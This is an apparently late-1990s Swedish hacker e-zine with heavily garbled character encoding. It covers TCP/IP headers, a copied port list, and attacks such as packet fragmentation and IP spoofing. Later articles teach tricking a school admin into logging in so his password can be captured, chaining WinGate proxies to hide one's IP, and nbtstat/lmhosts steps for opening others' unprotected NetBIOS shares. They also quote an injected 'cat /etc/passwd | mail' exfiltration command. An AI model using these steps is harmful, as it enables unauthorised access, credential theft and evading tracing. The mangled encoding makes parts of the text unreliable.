m<>ste den ju ocks<6B> etablera en connection-
Mer om "3-way handshake" kommer i senare artiklar, m<>jligtvis
i O-I #6.
F
<20>
Fin Flag andv<64>nds f<>r att st<73>nga connections (=anslutningar)
Varje avslutning av en connection skickar ett paket med Fin Fl-
ag, som m<>ste bli bekr<6B>ftad (godk<64>nd kan man ocks<6B> s<>ga) ocks<6B>
kan jag ber<65>tta att fyra paket andv<64>nds f<>r att st<73>nga en
connection.
A
<20>
Ack Flag
P
<20>
Push Flag
WINDOW
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
Numret som "data octets" b<>rjar med den som indikerar i acknowl-
edgment field som s<>ndaren sj<73>lvklart vill acceptera.
Size: 16 bit
CHECKSUM
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
Detta <20>r ett valfritt f<>lt som s<>kerhets kollar s<> att datan i
ett paket inte <20>r skadad. Checksum kontrollerar allts<74> i stor
del att det inte <20>r skett n<>gra fel i tcp <20>verf<72>ringen.
-==- TCP Flags -==-
TCP flaggorna <20>r antingen satta 1(on) och 0(off)
SYN Flag
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
SYN = synchronize
Denna flagga <20>r satt p<> on n<>r ett fj<66>rr-system vill starta en
tcp anslutning.
ACK Flag
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
ACK = acknowledge
N<>r denna flagga <20>r p<> on aktiveras "Acknowledgement field" i
TCP Headern.
FIN Flag
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
N<>r denna flagga <20>r satt p<> on, talar den om f<>r fj<66>rr-systemet
att avsluta tcp anslutningen.
RST
<20><><EFBFBD>
N<>r denna flagga <20>r satt p<> on talar den om f<>r fj<66>rr-systemet
att tcp anslutningen m<>ste bli <20>terst<73>lld (reset)
URG Flag
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
URG = Urgent Pointer Field
N<>r denna flagga <20>r satt p<> on talar den om f<>r "application l-
ayer Program" att paketet <20>r angel<65>get.
PSH Flag
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
PSH = Push Function
N<>r denna flagga <20>r satt p<> on, blir fj<66>rr-systemet att ett
stort antal paket som <20>r p<> v<>g.
-==- IP Header -==-
Alla paket fr<66>n TCP och UDP blir skickade till Operatorn f<>r
v<>xling. IP l<>gger till en header innan paketen levereraras vi-
dare. IP Headern <20>r mycket enklare en TCP men v<>ldigt viktigt.
IP Header
<20> <20>
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
<20> VER <20> LENGHT <20> SERV TYPE <20> PACKET LENGHT <20>
<20> IDENT <20> DF <20> MF <20> FRAG OFFSET <20>
<20> TTL <20> TRANSPORT <20> HEADER CHECKSUM <20>
<20> SENDING ADDRESS <20>
<20> DESTINATION ADDRESS <20>
<20> OPTIONS <20> PADDING <20>
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
<20> <20>
!!! Alla defentioner tas inte med !!!
VER
<20><><EFBFBD>
Ett enkelt litet f<>lt som h<>ller reda p<> vilken version av
protokollet som andv<64>nds.
LENGHT
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
Detta <20>r l<>ngden p<> IP Headern.
PACKET LENGHT
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
Detta <20>r l<>ngden p<> hela paketet.
IDENT
<20><><EFBFBD><EFBFBD><EFBFBD>
Ett enkelt litet f<>lt som h<>ller reda p<> vilken version av
Detta <20>r en unik identifierad som andv<64>nds f<>r att re-assamble-
ra fragmenterade msg:s.
DF
<20><>
N<>r denna flagga <20>r satt p<> on g<>r inte msg:et att fragmentera.
MF
<20><>
Denna talar om f<>r fj<66>rr-datorn att mer fragmentering av medel-
andet <20>r p<> v<>g. Fragmenteringen blir "re-assembled" av Intern-
t Layer.
FRAG OFFSET
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
H<>ller positionen av de specifika paketen i serien av fragment-
erade paket.
TTL
<20><><EFBFBD>
TTL = Time To Live
Utan detta f<>lt skulle alla data paket flyta omkring f<>r allti-
d. N<>r TTL <20>r uppe s<> kasserar den alltid n<>r ett data paket
flyter till punken 0(off) s<> "d<>r" dom.
TRANSPORT
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
Detta f<>lt inneh<65>ller numret fr<66>n "Transport Layer Protocol"
som behandlas i k<>ll systemet.
SENDING ADDRESS
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
<20>r adressen fr<66>n sendnings systemet, allts<74> var ifr<66>n paketen
kommer ifr<66>n.
DESTINATION ADDRESS
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
<20>r addressen dit paketet ska.
-==- UDP Header -==-
UDP Headern <20>r mycket enklare <20>n vad TCP Headern <20>r eftersom
UDP headern inte sammanh<6E>ller lika mycket information som
TCP.
<EFBFBD> <20>
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
<20> SRC PORT <20> DST PORT <20>
<20> LENGHT <20> CHECKSUM <20>
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
<EFBFBD> <20>
Alla f<>lten i UDP headern <20>r exakt samma som i TCP headern,
f<>r att f<> en beskrivning <20>r det bara att g<> till titeln TCP
Header.
-==- Sammanfattning av huvudsyftena i tcp/ip -==-
TCP : Tar han om <20>verf<72>ringen och ser till s<> att allt skick-
as iv<69>g sen tar IP hand om var den ska skickas.
IP : Tar hand om adresseringen och routing av paket mellan
olika v<>rdar och n<>tverk
ICMP: <20>r dock ett enskilt protokoll, men kommunicerar med
tcp/ip genom att rapportera fel osv.
ARP : Lite mera komplicerat, <20>ven detta kanske dyker upp i
senare artiklar. Skaffar fram h<>rdvaruadresser (MAC)
fr<66>n olika som ligger i samma N<>tverk.
-==- Vanliga TCP/IP, UDP attacker -==-
IP Hijacking
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
Andv<64>nds f<>r att styra om TCP paket str<74>mmen s<> du kan bli
godk<64>nd och komma f<>rbi skydd s<>som t.ex. Firewalls, one-
time password och ticketing authentication.
Packet Fragmentation Attacks
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
Jag har f<>rklarat lite enkelt ovan om Packet Fragmentation, men
doch inte i helhet. Packet Fragmentation <20>r en del av IP som d-
elar in datagram i flera olika delar vid <20>verf<72>ringen som sedan
blir tillbaka delat till ett datagram n<>r den n<>t DST Port (De-
stionation Port)
Exempel:
SRC Port DST Port
.--------. _ .--------.
| | |P|_ | |
|Datagram| ===> <20>|P| _ ===> |Datagram|
| | <20> |P| | |
'--------' <20> '--------'
P = Paket (eng. packet) ..t<>nke att ni inte e s<> bra p<> engels-
ka som jag inte <20>r =-o)
Attacken:
En Packet Fragmentation Attack kan andv<64>ndas f<>r att komma
f<>rbi en en befintlig Firewall, men detta beror inte p<> hur
Paket Fragmenteringen <20>r uppbyggt, fast en liten del hur paket-
en blir "reassembled"
Ett datagram ska bli uppdelade i flera paket som l<>mnar huvud
portionen av paketet of<6F>r<EFBFBD>ndard. Ok, men skit samma. Nu ska jag
ber<65>tta teoretiskt hur det funkar :-O
Elajt Cr1Xx0rH4Xx0r skapar ett litet paket som fodrar sig att
vara den f<>rsta biten i ett "multi-packet datagram" Den <20>r
<20>r skriven p<> ett s<>tt som visar sig att den ska genom port 80
och ska till "http service" och port 80 <20>r <20>ppen <20>verallt som
standard. Universitet, Arbeten har stor nytta av http idag, s<>
d<>rf<72>r till<6C>ter Brandv<64>ggen elr. Paket Filtret att paketet <20>ker
f<>rbi. Elajt Cr1Xx0rH4Xx0r <20>ndrar v<>rdet som h<>nvisar paketet
genom port 80 till port 23 som andv<64>nds av telnet, men hoppsan
nu fick han ju telnet access ocks<6B>...
Voila ! ..firewalls och filter kan dra <20>t helvete !
PS. om du vill veta mera om Packet Fragmentation Attacks s<>
h<>nvisar jag dig till "TCP packet fragment attacks against
firewalls and filters" som <20>r mycket informativ. Visserligen
s<> beskriver den inget praktiskt. Men de teoretiska g<>r all-
tid f<>re de praktiska DS.
IP Spoofing
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
IP Spoofing eller IP Faking <20>r en attack som <20>ndrar dit
IP till ett annat. Detta kan andv<64>ndas f<>r att g<>mma identitet
eller skydda dig mot DoS attacks (DoS=Denial Of Service)
Denial Of Service <20>r attacker mot TCP/Ip s<>som Flooding, Nuking
osv som kan f<> en tcp connection att h<>nga sig eller bli
upptaget s<> att tcp anslutningen inte kan andv<64>ndas.
ok. jag tog ju inte upp alla de vanligaste. Men hmm...jag har
ju inte studerst dem alla. Jag hade n<>got underlig k<>nsla i
kroppen att artikeln va brodskande.
-==- UDP och TCP, skillnader och nackdelar -==-
TCP andv<64>nder en fast anslutning (som en kanal) d<>r all data
g<>r igenom medans UDP inte har fasta anslutningar, utan allti-
ng skickas iv<69>g i form av Paket. UDP skulle kunna g<>mnf<6E>ras med
radio och TCP med telefon. Signalerna fr<66>n radion kan f<>ngas
upp och manipuleras medans telefonens elektriska impulser skic-
las via en best<73>mt kabel. Du vet gamla ICQ anv<6E>nde ju sig av
UDP, det var d<>rf<72>r dessa ICQ Spoofers funkade. En ICQ Spoofer
kunde allts<74> andra skicka messages fr<66>n andra andv<64>ndare.
Kunde andv<64>ndas f<>r att bryta v<>nskap osv. [h0h0]
Exempel p<> UDP connection
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
______ ______
| | --> --> | DST |
| UDP | ---> ---> | HOST | (Fr<46>n Basics of TCP/IP)
| | --> --> | |
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
Som du ser andv<64>nder inte UDP en fast anslutning till DST Host
(Destination Host) Medans TCP andv<64>nder en fast anslutning
(se. exempel p<> TCP connection nedan)
Exempel p<> "3-way-handshake"
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
______ ________
| | ===========> 500 | REMOTE |
| TCP | | HOST | (Fr<46>n Basics of TCP/IP)
| | <======= ACK 501 | |
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
TCP andv<64>nder "3-way-Hanshake" f<>r att starta en fast data
<20>verf<72>ring. Jag tog upp tidigare lite enkelt om SYN och ACK
Flags och i Exemplet nedan p<> en "3-way-Handshake" och det <20>r
d<>r dom kommer in :)
Exempel p<> "3-way-handshake"
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
______ ________
1:a | | ===========> SYN SEQ 10 | REMOTE |
2:a | TCP | SYN SEQ 400 ACK 11 <=== | HOST | (Fr<46>n Basics of
3:e | | ==============> ACK 401 | | TCP/IP)
^ <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
Steg i <20>verf<72>ringen.
-==- Portar som andv<64>nder TCP/IP, UDP -==-
Jag kan ber<65>tta att alla dessa services andv<64>nder sig av
TCP/IP f<>r Paket <20>verf<72>ring och V<>xling.
H<>r kommer en lista p<> tj<74>nster som andv<64>nder tcp/ip och udp.
Jag har faktiskt rippat den fr<66>n //Windows/services [lamt va?]
echo 7/tcp
echo 7/udp
discard 9/tcp sink null
discard 9/udp sink null
systat 11/tcp
systat 11/tcp users
daytime 13/tcp
daytime 13/udp
netstat 15/tcp
qotd 17/tcp quote
qotd 17/udp quote
chargen 19/tcp ttytst source
chargen 19/udp ttytst source
ftp-data 20/tcp
ftp 21/tcp
telnet 23/tcp
smtp 25/tcp mail
time 37/tcp timserver
time 37/udp timserver
rlp 39/udp resource # resource location
name 42/tcp nameserver
name 42/udp nameserver
whois 43/tcp nicname # usually to sri-nic
domain 53/tcp nameserver # name-domain server
domain 53/udp nameserver
nameserver 53/tcp domain # name-domain server
nameserver 53/udp domain
mtp 57/tcp # deprecated
bootp 67/udp # boot program server
tftp 69/udp
rje 77/tcp netrjs
finger 79/tcp
link 87/tcp ttylink
supdup 95/tcp
hostnames 101/tcp hostname # usually from sri-nic
iso-tsap 102/tcp
dictionary 103/tcp webster
x400 103/tcp # ISO Mail
x400-snd 104/tcp
csnet-ns 105/tcp
pop 109/tcp postoffice
pop2 109/tcp # Post Office
pop3 110/tcp postoffice
portmap 111/tcp
portmap 111/udp
sunrpc 111/tcp
sunrpc 111/udp
auth 113/tcp authentication
sftp 115/tcp
path 117/tcp
uucp-path 117/tcp
nntp 119/tcp usenet # Network News Transfer
ntp 123/udp ntpd ntp # network time protocol (exp)
nbname 137/udp
nbdatagram 138/udp
nbsession 139/tcp
NeWS 144/tcp news
sgmp 153/udp sgmp
tcprepo 158/tcp repository # PCMAIL
snmp 161/udp snmp
snmp-trap 162/udp snmp
print-srv 170/tcp # network PostScript
vmnet 175/tcp
load 315/udp
vmnet0 400/tcp
sytek 500/udp
biff 512/udp comsat
exec 512/tcp
login 513/tcp
who 513/udp whod
shell 514/tcp cmd # no passwords used
syslog 514/udp
printer 515/tcp spooler # line printer spooler
talk 517/udp
ntalk 518/udp
efs 520/tcp # for LucasFilm
route 520/udp router routed
timed 525/udp timeserver
tempo 526/tcp newdate
courier 530/tcp rpc
conference 531/tcp chat
rvd-control 531/udp MIT disk
netnews 532/tcp readnews
netwall 533/udp # -for emergency broadcasts
uucp 540/tcp uucpd # uucp daemon
klogin 543/tcp # Kerberos authenticated rlogin
kshell 544/tcp cmd # and remote shell
new-rwho 550/udp new-who # experimental
remotefs 556/tcp rfs_server rfs# Brunhoff remote filesystem
rmonitor 560/udp rmonitord # experimental
monitor 561/udp # experimental
garcon 600/tcp
maitrd 601/tcp
busboy 602/tcp
acctmaster 700/udp
acctslave 701/udp
acct 702/udp
acctlogin 703/udp
acctprinter 704/udp
elcsd 704/udp # errlog
acctinfo 705/udp
acctslave2 706/udp
acctdisk 707/udp
kerberos 750/tcp kdc # Kerberos authentication--tcp
kerberos 750/udp kdc # Kerberos authentication--udp
kerberos_master 751/tcp # Kerberos authentication
kerberos_master 751/udp # Kerberos authentication
passwd_server 752/udp # Kerberos passwd server
userreg_server 753/udp # Kerberos userreg server
krb_prop 754/tcp # Kerberos slave propagation
erlogin 888/tcp # Login and environment passing
kpop 1109/tcp # Pop with Kerberos
phone 1167/udp
ingreslock 1524/tcp
maze 1666/udp
nfs 2049/udp # sun nfs
knetd 2053/tcp # Kerberos de-multiplexor
eklogin 2105/tcp # Kerberos encrypted rlogin
rmt 5555/tcp rmtd
mtb 5556/tcp mtbd # mtb backup
man 9535/tcp # remote man server
w 9536/tcp
mantst 9537/tcp # remote man server, testing
bnews 10000/tcp
rscs0 10000/udp
queue 10001/tcp
rscs1 10001/udp
poker 10002/tcp
rscs2 10002/udp
gateway 10003/tcp
rscs3 10003/udp
remp 10004/tcp
rscs4 10004/udp
rscs5 10005/udp
rscs6 10006/udp
rscs7 10007/udp
rscs8 10008/udp
rscs9 10009/udp
rscsa 10010/udp
rscsb 10011/udp
qmaster 10012/tcp
qmaster 10012/udp
-==- G<> vidare -==-
MyWord II (IP Faking) - Myword <20>r en serie textfiler som <20>r
v<>ldigt informativa, dom kan bla. h<>mtas p<> swehack.cjb.net
och i en av dem st<73>r det om IP Spoofing eller IP Faking v<>lj
sj<73>lv vilket du tycker l<>ter b<>st.
A short overview of IP spoofing: PART I
Simple Spoofing (Non blind) - <20>r s<> pass k<>nd s<> den finns lite
h<>r och d<>r p<> olika hemsidor, det <20>r bara s<>ka eller maila
mig om du vill ha den.
A short overview of IP spoofing: PART II
Advanced spoofing (Blind) - <20>r s<> pass k<>nd s<> den finns lite
h<>r och d<>r p<> olika hemsidor, det <20>r bara s<>ka eller maila
mig om du vill ha den.
Understanding IP Addressing
http://www.3com.com/nsc/501302.html. Avancerad information om
hur IP addresseringen <20>r uppbyggt och hur den fungerar.
Simple Attack Against TCP
Tutorial om IP Hijacking.
Security Problems in the TCP/IP Protocol Suite
Beskriver olika h<>l och attacker i och mot TCP/IP, h<>gt rekomm-
enderad.
-==- Efterord -==-
Jaja, det var bara en del av min privata TCP/IP utbildning, jag
kan n<>stan garantera att det kommer mera avancerad information
om TCP/IP och olika andra internet kommunikations protokoll
inom snaraste framtid. Om du tycker att jag skrev med en aning
annorlunda svenska s<> beror det p<> att jag inte p<> topp fattar
allt sj<73>lv, efter som jag just genomg<6D>r min privata utbildning,
s<> du skulle ju kunna kalla artikeln som en uppsats. Men utan
betyg s<> att s<>ga. Alla flames skickas till /dev/null men
g<>rna seri<72>sa kommentarer och tips hur jag skulle kunna g<>ra
artikeln b<>ttre uppskattas. Allt skickas till keytrace@usa.net.
En del delar <20>r <20>versatta och en del rippade faktiskt. Men allt
<20>r inte helt rippat s<> kom inte och klaga, jag har faktiskt
skrivit k<>llf<6C>rteckning.
-==- Tack Till -==-
Gazzaud, pewp och apotygma
-==- K<>llor -==-
The Basics of TCP/IP
Introduction to the Internet Protocols
TCP SYN Flooding and IP Spoofing Attacks
TCP packet fragment attacks against firewalls and filters
OSI reference model
The TCP Header Fields
+-------------------------------------------------------------+
| L<>s lokala filer i NT [Overmarzz] |
+-------------------------------------------------------------+
Den h<>r texten kommer att beskriva ett enkelt s<>tt att f<> tag i
windows/nt l<>senord (.pwl) P<> min skola s<> <20>r det l<>senord p<>
bios'en, dos g<>r inte att k<>ra (det kommer upp en text som
s<>ger att man ska prata med adminen), vi har bara "Logga av"
och "Program" i startmenyn, I.E <20>r sp<73>rrat f<>r att l<>sa lokala
filer och vi har inga ikoner p<> skrivbordet. Det kan tyckas som
om det vore sv<73>rt att f<> en pwl fil men INTE. Jag testade allt,
bla word. Word visade sig vara ett prakt exempel p<> hur man kan
l<>sa lokalt i NT :) Man kunde klicka p<> c:\ men det h<>nde
inget, s<> jag tryckte p<> favoriter. vips s<> var c:\windows\fav-
oriter uppe och d<>rifr<66>n klickade jag ett steg tillbaka s<> jag
hamnade i c:\windows. Ok t<>nkte jag, det var kul. Men vad
tj<74>nar jag p<> det? Jag har <20>nnu inte hunnit testa detta jag ska
ber<65>tta nu och har h<>rt att inloggnings l<>sen inte sparas i pwl
... i s<> fall..synd! men alla fall...Dra ut den fula TP kablen
och spring till adminen som en idiot
J = Jag L = Lam Admin
J - Dator 11 funkar inte..man kan inte logga p<>
L - Oj b<>st JAG tar en titt..
I dator salen s<> kommer adminen f<>rst pr<70>va logga p<>..
L - N<>h<EFBFBD>, det var konstigt, jag som <20>r 37331 :/
J - Humm..(stirrar p<> sladden) Ska inte den sitta i?
L - Jo, heh..(glad och samtidigt stolt att han l<>ste problemet)
J - Pr<50>va om det funkar nu
L - Well kid..You read my mind .. :)
Adminen pr<70>var logga p<> med sitt user/pass ..
OM nt SPARAR inloggnings l<>senordet s<> <20>r det k<>rt f<>r honom :)
annars s<> kan man ju alltid pilla i systemet :)
Ok, jag inser att denna filen <20>r lam, men den b<>r l<>sas med
lite ironi
+-------------------------------------------------------------+
| Wingates [Overmarzz] |
+-------------------------------------------------------------+
(Denna txt'n <20>r <20>versatt, den riktiga finns p<>
hackersclub) Wingates <20>r ett bra alternativ f<>r s<>ker hacking
M<>nga wingates loggar allt men sen finns det ju <20>ven anonyma
s<>dana (hur skulle man annars klara sig :)
Denna sortens spoofing kallas non-blind spoofing Du har en ip
fast du g<>r igenom andra servrar
Blind IP spoofing <20>r otroligt avancerat..
Det <20>r n<>r man f<>rutser TCP sequence number av ett 'trusted'
TCP session mellan tv<74> tv<74> andra machiner och hijack'ar sj<73>lva
session genom att modifiera hans IP adress och "injecerar" ett
binart commando ex "cat /etc/passwd | mail n<>n@ting.h<>r".
Och det <20>r sv<73>rt... Men om du verkligen vill l<>ra dig om det s<>
finns det 2-3 bra txt filer om det p<> min hemsida
Hur du anv<6E>nder wingates r<>tt
Vi antar att jag har 3st wingates
24.231.12.1 = A
24.103.43.5 = B
24.234.13.2 = C
(Om du har windows)
Som alla vet s<> <20>r ju telnet clienten (windows) det <20>nda
verktyg som man anv<6E>nder mycket vid "hacking" (kanske lite sta-
rkt ord)
Connecta till A i telnet
Prompten kommer att se ut s<> h<>r:
WinGate>
H<>r kan du connecta vidare till andra servrar
bra t<>nker du...
Men <20>r man paranoid som jag s<> kan det bli b<>ttre
connecta nu till wingate B
WinGate>24.103.43.5
Och samma prompt kommer upp..
Nu kan du connecta till wingate 3 osv, f<>r att till sist
connecta till den server som du t<>nkte ..... eller vad du
vill g<>ra..
Din burk -> Din isp -> A -> B -> C -> till den du vill till..
Detta kommer att f<> effekten att din ip blir sv<73>r att sp<73>ra
Bara A ser din riktiga IP - B B ser A's IP - C ser B's IP osv..
Om du vill connecta till andra portar s<> kan du sj<73>lvklart g<>ra
det genom denna enkla f<>r<EFBFBD>ndring
WinGate>121.433.23.1:port_nummer
+-------------------------------------------------------------+
| S<>kerhets h<>l i Netbios [Knash] |
+-------------------------------------------------------------+
System: Windoze 95, NT
Z-Attack = Personen som attackerar :)
Det har uppt<70>ckts att n<>gon med ett Win95 system kan "remotly"
skaffa sig tillg<6C>ng till delade (shared) mappar p<> Win95/NT
system. Z-Attack andv<64>nder sig av nbtstat f<>r att lista de
aktuella netbios sammantr<74>dande datorerna. Z-Attack l<>gger
till dator namnet i sin c:/Windows/lmhosts. Han s<>ker efter
datorns namn som han la till i lmhosts. Han s<>ker efter datorn
och f<>rhoppningsvis visar en ikon sig. D<> f<>r han access till
alla icke l<>senords skyddande mappar.
S<> hur utf<74>r du detta praktiskt ?
- Steg 1
H<>r <20>r kommandot du ger som indata i ditt MSDOS skal
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
<nbtstat -A ipaddress#>
Om det nu <20>r en netbios session som du ser s<> ger nbtstat
utdata genom att visa de olika datorerna i en lista. De f<>rsta
namnet du ser.
- Steg 2
<20>ppna c:/Windows/lmhosts och l<>gg till: ipaddress namnp<6E>datorn
ipadress : ip adressen till dator som du vill komma <20>t.
namnp<6E>datorn: namn p<> datorn som du vill komma <20>t.
Spara det och ta bort din egen netbios session.
- Steg 3
Ge kommandot <nbtstat -R> som sedan borde ge purge succsessfu-
l, om inte s<> <20>r det v<>l kanske n<>got n<>tverks fel eller n<>t.
- Steg 4
Nu kan du g<> och s<>ka efter datorn (s<>k p<> datorns namn) om
den nu visar en s<>t liten ikon, dubbelklicka p<> den och sen
SKA du se alla delade mappar.
| L<>sning p<> problemet |
Jag t<>nke vara sn<73>ll mot alla LAMA N<>TVERKS ADMINISTRAT<41>RER och
s<>ga att det finns en l<>sning till detta. Visserligen <20>r netbi-
os problemet ganska omfattande. Men det b<>sta du kan g<>ra <20>r
att s<>tta l<>senord p<> alla delade mappar.
+-------------------------------------------------------------+
| nato.int, whitehouse.gov hacked [Axxezz] |
+-------------------------------------------------------------+
Det har nu blivit k<>nt att www.nato.int samt www.whitehouse.gov
har blivit hackade utav ryska hackers som en protest mot NATO:s
bombningar mot det forna Jugoslavien. Det verkar som tom de me-
st bevakade sidorna fortfarande l<>tt kan hamna i farozonen s<>
l<>nge dessa hackers har den r<>tta motivationen. NATO har <20>nnu
inte uttalat sig om detta hack och Vita Huset p<>st<73>r att det
var pga en hardvaru krash som sidan var nere n<>stan 2 dygn.
K<>lla: SAFER
+-------------------------------------------------------------+
| Enkelt om Terminaler [Knash] |
+-------------------------------------------------------------+
Jag t<>nke faktiskt ta upp lite om terminaler. Jag ska f<>rklara
vad dom andv<64>nds till och hur dom ser ut, inte mycket mera <20>n
s<>.
M<>lgrupp: Extrema wannbee phreakerz (men inte s<> m<>nga kanske
vet vad de riktiga namnen f<>r terminalerna <20>r och
inte m<>nga har s<>tt oranga (LME:OR) terminaler och
inte heller turkosa terminaler (3M:or)
-=- Flames skickas ju till /dev/null s<>klart -=-
+ Terminal i helhet
+ LSA Plus (Den vita terminalen)
+ OLDschool (Den svarta terminalen)
+ LME (Den oranga terminalen)
+ 3m (Den turkosa terminalen)
-=o[ Terminal i helhet ]o=-
Det finns v<>l olika namn, personligen kallar jag dem f<>r Term-
inaler men det finns dom som kallar dem Centraler ocks<6B>.
Terminalen sammankopplar flera linor f<>r att sen skicka ut dem
i en i en enskild kabel som g<>r till C-Sk<53>pen som kopplar ihop
100 linor som sen skickas i en enskild kabel till Kocentratio-
ns Centralerna.
-=o[ LSA Plus ]o=-
Har funnits ett tag sitter i de gr<67> Kopplingsboxarna som <20>r
gjorda av metall (idiotf<74>rklaring) <20>ven kallade Metall Jappsa-
re. Metall Jappsaren <20>r ett f<>rdelningssk<73>p av telelinor. Men
till sj<73>lva terminalen som sammanbinder kablarna (telelinorn-
a) En LSA Plus klarar att sammankoppla max 20 linor och <20>r
12cm l<>ng, 2cm h<>g och 1,5cm bred.
LSA Plus <20>r faktiskt de namnet som telia andv<64>nder, det <20>r
sj<73>lva produktnamnet. Popul<75>rt bland Phreakers kallas termina-
len faktiskt enkelt och oseri<72>st f<>r Vit terminal. Jag hade
faktiskt inte t<>nkt mig att f<>rklara allt f<>r mycket, se
M<>lgrupp i b<>rjan av artikeln.
-=o[ OLDSchool ]o=-
Den mest k<>nda terminalen sj<73>lvklart, har funnits sen farfar
lekte i sandl<64>dan. Finns som standard i de runda Kopplingsbox-
arna med svart topp. Terminalen <20>r helsvart med utst<73>ende
skruvar som sitter p<> plintar. Terminalen sammankopplar som
max 10 linor. OLDsch00l <20>r 10,5 cm l<>ng, 1,2cm h<>g och 9mm
bred.
-=o[ LME ]o=-
